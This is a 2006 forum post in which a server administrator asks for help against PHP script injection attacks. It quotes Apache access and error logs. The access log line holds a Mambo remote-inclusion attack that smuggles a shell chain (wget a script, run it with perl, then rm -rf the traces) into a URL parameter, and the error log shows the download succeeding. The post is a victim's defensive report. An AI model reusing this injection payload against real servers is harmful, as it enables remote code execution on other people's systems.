Go Back   HowtoForge Forums | HowtoForge - Linux Howtos and Tutorials > ISPConfig 2 > General

Do you like HowtoForge? Please consider supporting us by becoming a subscriber.
Thread Tools Display Modes
Prev Previous Post   Next Post Next
Old 16th July 2006, 02:15
Grizzly Grizzly is offline
Join Date: Feb 2006
Posts: 41
Thanks: 0
Thanked 0 Times in 0 Posts
Default php script injections

server being attacked by script injections I have already chmod wget but attacks still continue and seem to be getting more advanced need help securing the server

extract from logfile /var/log/apache2/access_log - - [16/Jul/2006:00:33:30 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=;wget%20http://;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 404 1181 "-" "Mozilla/5.0"

extract from logfile /var/log/apache2/error_log

[Sat Jul 15 22:20:45 2006] [error] an unknown filter was not added: PHP
[Sat Jul 15 22:20:45 2006] [error] an unknown filter was not added: PHP
=> `mambo.txt'
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,282 (16K) [text/plain]

0K .......... ..... 100% 7.77 KB/s

22:20:58 (7.77 KB/s) - `mambo.txt' saved [16282/16282]

kill: usage: kill [-s sigspec | -n signum | -sigspec] [pid | job]... or kill -l [sigspec]
[Sat Jul 15 22:41:53 2006] [warn] child process 13552 still did not exit, sending a SIGTERM
[Sat Jul 15 22:41:53 2006] [warn] child process 30607 still did not exit, sending a SIGTERM

Need help advice anything...

Thank you in advance
Reply With Quote
Sponsored Links


Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
"unknown filter" growing apache log. wwparrish Installation/Configuration 6 1st September 2006 19:40
perfect setup suse 10 - phpmyadmin & mysql question reddog Server Operation 7 17th June 2006 13:59
2 domains, 1 site wadims Installation/Configuration 13 31st May 2006 01:21
Downgrade php5 to php4.4.2 llizards Installation/Configuration 4 14th March 2006 00:58
all my site go to /var/www/ Absolusteph Installation/Configuration 14 11th March 2006 22:27

All times are GMT +2. The time now is 23:10.

Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2014, vBulletin Solutions, Inc.